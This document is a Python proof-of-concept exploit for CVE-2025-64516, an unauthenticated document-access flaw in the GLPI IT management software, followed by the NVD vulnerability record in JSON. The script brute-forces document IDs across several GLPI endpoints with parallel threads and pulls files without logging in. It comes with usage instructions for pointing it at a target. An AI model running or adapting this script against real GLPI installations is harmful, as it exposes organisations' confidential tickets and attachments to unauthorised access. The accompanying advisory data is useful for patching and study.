CVE-2025-64516

# CVE-2025-64516 PoC - GLPI Unauthenticated Document Access # This PoC demonstrates IDOR vulnerability in GLPI document access import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed def check_glpi_version(url): """Check if target is running vulnerable GLPI version""" try: response = requests.get(url + '/', timeout=10) if 'GLPI' in response.text: return True except: pass return False def download_document(base_url, doc_id): """Attempt to download document by ID without authentication""" # Common GLPI document endpoints endpoints = [ f'{base_url}/front/document.send.php?docid={doc_id}', f'{base_url}/ajax/getFile.php?docid={doc_id}', f'{base_url}/files/_dumps/{doc_id}', ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10, allow_redirects=True) # Check if we got actual file content (not login page) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'text/html' not in content_type and len(response.content) > 0: print(f'[+] SUCCESS: Downloaded document ID {doc_id}') print(f' Endpoint: {endpoint}') print(f' Size: {len(response.content)} bytes') print(f' Content-Type: {content_type}') return True except Exception as e: continue return False def exploit(target_url, start_id=1, end_id=1000, threads=10): """Main exploitation function""" print(f'[*] Target: {target_url}') print(f'[*] Scanning document IDs from {start_id} to {end_id}') print(f'[*] Using {threads} threads') print('-' * 60) with ThreadPoolExecutor(max_workers=threads) as executor: futures = {executor.submit(download_document, target_url, doc_id): doc_id for doc_id in range(start_id, end_id + 1)} for future in as_completed(futures): try: result = future.result() except Exception as e: pass if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-64516.py <target_url> [start_id] [end_id]') print('Example: python cve-2025-64516.py http://target.com/glpi 1 1000') sys.exit(1) target = sys.argv[1].rstrip('/') start = int(sys.argv[2]) if len(sys.argv) > 2 else 1 end = int(sys.argv[3]) if len(sys.argv) > 3 else 1000 exploit(target, start, end)

{"cve": {"id": "CVE-2025-64516", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.487", "lastModified": "2026-01-21T20:53:37.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. Prior to 10.0.21 and 11.0.3, an unauthorized user can access GLPI documents attached to any item (ticket, asset, ...). If the public FAQ is enabled, this unauthorized access can be performed by an anonymous user. This vulnerability is fixed in 10.0.21 and 11.0.3."}, {"lang": "es", "value": "GLPI es un paquete de software gratuito de gestión de activos y TI. Antes de 10.0.21 y 11.0.3, un usuario no autorizado puede acceder a documentos de GLPI adjuntos a cualquier elemento (ticket, activo, ...). Si la FAQ pública está habilitada, este acceso no autorizado puede ser realizado por un usuario anónimo. Esta vulnerabilidad está corregida en 10.0.21 y 11.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.21", "matchCriteriaId": "71497A1A-8C87-48D5-9BA2-CFFF057BC3A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.3", "matchCriteriaId": "A9EA5DDA-E0E7-4530-B266-309AF584D327"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/commit/51412a89d3174cfe22967b051d527febdbceab3c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/glpi-project/glpi/commit/ee7ee28e0645198311c0a9e0c4e4b712b8788e27", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/glpi-project/glpi/releases/tag/10.0.21", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/releases/tag/11.0.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-487h-7mxm-7r46", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}